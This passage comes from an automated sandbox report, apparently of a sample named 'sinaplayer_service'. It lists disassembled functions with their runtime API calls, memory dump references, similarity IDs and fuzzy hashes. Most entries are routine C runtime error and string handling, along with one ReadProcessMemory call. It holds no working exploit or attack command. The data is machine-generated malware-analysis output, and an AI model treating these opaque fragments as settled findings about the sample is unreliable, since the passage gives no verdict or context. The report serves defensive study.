                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14D5
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6C5CCAB9,00000000,00010000,00030000,?,6C5B0802,?,6C57CCEB,?,?,6C57CD94,00000000), ref: 6C5B14E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1498936549-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0A96
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0AA1
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0ABF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0ACA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D6C18
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D6C23
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D6C3D
                                                                                                                                                                                                    • __localtime32_s.LIBCMT(?,?), ref: 6C5D6C4F
                                                                                                                                                                                                      • Part of subcall function 6C5D7269: _errno.MSVCR120(?,?,6C5D6C54,?,?), ref: 6C5D7283
                                                                                                                                                                                                      • Part of subcall function 6C5D7269: _invalid_parameter_noinfo.MSVCR120(?,?,6C5D6C54,?,?), ref: 6C5D728D
                                                                                                                                                                                                    • asctime.MSVCR120(?), ref: 6C5D6C5E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s_invalid_parameterasctime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4154182036-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000004), ref: 00379EB7
                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 00379EC9
                                                                                                                                                                                                    • abort.MSVCR120 ref: 00379EE1
                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00379F00
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379F07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@InitializeUninitializeabort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4233853893-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0B88
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0B93
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D0BB7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D0BC2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0038E770), ref: 0038FA21
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000008,00000000,?,0038E770), ref: 0038FA2B
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,?,0038E770), ref: 0038FA37
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0038FA3D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FA48
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteFreeLibrarySection$??3@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2236057424-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C564D84
                                                                                                                                                                                                    • __doserrno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFCE
                                                                                                                                                                                                    • _errno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFD6
                                                                                                                                                                                                    • _errno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFE6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFF1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strlwr_s_ultoa_sstrncmp
                                                                                                                                                                                                    • String ID: file
                                                                                                                                                                                                    • API String ID: 3236609070-2359244304
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 6C586B72
                                                                                                                                                                                                      • Part of subcall function 6C596295: __87except.LIBCMT ref: 6C5962D0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,8285FFAB,00000000,00000000,00000000,00000000,0000006C,8285FFAB,00000000,0000003C,00000000), ref: 0037682D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0AAAAAAA), ref: 003768D6
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,00000000,0AAAAAAA,8285FFAB,00000000,00000000), ref: 003768E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1549073800-3788999226
                                                                                                                                                                                                    • Opcode ID: 18882ced57dbf7574177b4fb12531454f8db27f67b158f28dcf6541595677209
                                                                                                                                                                                                    • Instruction ID: 0c483846b050d9730facef4b32335bbde13733a05e59a8dcfbdbe6a77f9fe22c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18882ced57dbf7574177b4fb12531454f8db27f67b158f28dcf6541595677209
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED5192B2A00109AFCF15DF58CD92AAEBBB9FF88300F148569F9099F355D735A910CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AB64A
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6C5AB651
                                                                                                                                                                                                      • Part of subcall function 6C5801E3: DName::DName.LIBCMT ref: 6C58029A
                                                                                                                                                                                                      • Part of subcall function 6C5801E3: DName::operator+.LIBCMT ref: 6C5802A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::Name::operator+
                                                                                                                                                                                                    • String ID: CV:
                                                                                                                                                                                                    • API String ID: 2649573449-3725821052
                                                                                                                                                                                                    • Opcode ID: 6ac9b5507699f570defbd1eb558d58b24b1810b875b9b7e5872692d649e8fafb
                                                                                                                                                                                                    • Instruction ID: 1c9d30ed7f82baac0eb90764c2ff9ce22de3171e4daae7334333ee512e0dd337
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ac9b5507699f570defbd1eb558d58b24b1810b875b9b7e5872692d649e8fafb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6413731A4918ADFDF24CBAACCC9BA97BFAEB46314F140559D415C7B60D73088C9CB68
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?unshift@?$codecvt@_WDH@std@@QBEHAAHPAD1AAPAD@Z.MSVCP120(0039FC64,00000000,00000008,?), ref: 003921DA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00392251
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@?unshift@?$codecvt@_H@std@@
                                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                                    • API String ID: 3553067384-244998873
                                                                                                                                                                                                    • Opcode ID: 865ac42321f3807758accf0bc0991c3a6994a3ff365f6ad09415793c055b712e
                                                                                                                                                                                                    • Instruction ID: 0ae7b82fe6a0eb1ad33d81fa4b2164950de7c43dcfd6277870c4bd4d366ad5b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 865ac42321f3807758accf0bc0991c3a6994a3ff365f6ad09415793c055b712e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941E631A00609AFDF16CBA8C884BEEBBB8FF09320F544619D511B7681D735A984CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C52C0,?,00000001,?,00386079,00000000,00000005,?,?,?,?,?,?,8285FFAB), ref: 00380D5D
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,00000000,y`8,6C6C52C0,?,00000001,?,00386079,00000000,00000005), ref: 00380D90
                                                                                                                                                                                                      • Part of subcall function 00380C20: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C3A
                                                                                                                                                                                                      • Part of subcall function 00380C20: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C5E
                                                                                                                                                                                                      • Part of subcall function 00380C20: memcpy.MSVCR120(00000000,00386079,?,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000), ref: 00380C9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@memcpy$Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: string too long$y`8
                                                                                                                                                                                                    • API String ID: 433638341-4268077810
                                                                                                                                                                                                    • Opcode ID: 02c7a222a09f88070413f6c44a40faac3ba485b0ff6224655c9db5dc94ffb619
                                                                                                                                                                                                    • Instruction ID: e11c6cfb9f8d158c0303502e476afb2c146ceb8ccf642f4a6372ace65d1ef3f6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c7a222a09f88070413f6c44a40faac3ba485b0ff6224655c9db5dc94ffb619
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63312C323003105BDB7DBE9CD88095AF7A9EF81710710496EE485CB751C770E84CC790
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(?), ref: 0038E482
                                                                                                                                                                                                    • wcscpy_s.MSVCR120 ref: 0038E49E
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000), ref: 0038E4B6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MemoryProcessReadwcscpy_s
                                                                                                                                                                                                    • String ID: ptime
                                                                                                                                                                                                    • API String ID: 2069118419-1897943179
                                                                                                                                                                                                    • Opcode ID: e7b7ac2e487cce016890a43ffee488fffd2c9496d611a9226f2f71eb0e9ef921
                                                                                                                                                                                                    • Instruction ID: fb42f70769ae6d10a4649470c0c5d11504eca9d86051098e8571d7b6f419d551
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7b7ac2e487cce016890a43ffee488fffd2c9496d611a9226f2f71eb0e9ef921
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2210672A003045BDB22EEAAD84679AB3E8EF48310F1046BEE84EC7150E671E9459791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C56E0,00000000,?,0038CF97,00000000,00000000,?,000000FF,00000001,?,00000000,000000FF,8285FFAB,6C6C2CC0,6C6C56E0), ref: 0038D63B
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C2CC0,6C6C56E0,00000000,?,0038CF97,00000000,00000000,?,000000FF,00000001,?,00000000,000000FF,8285FFAB,6C6C2CC0), ref: 0038D65A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@
                                                                                                                                                                                                    • String ID: string too long$Vll
                                                                                                                                                                                                    • API String ID: 1004598685-1565140922
APIs
• ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,00374F85,00000000,00000000,?,?,?,?,003722E9,?,?,00000000,-00000002), ref: 00374977
• memcpy.MSVCR120(?,?,?,?,?,?,?,00374F85,00000000,00000000,?,?,?,?,003722E9,?), ref: 003749C3
• ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,00374F85,00000000,00000000,?,?,?,?,003722E9,?,?,00000000), ref: 003749CF
Strings
Memory Dump Source
• Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
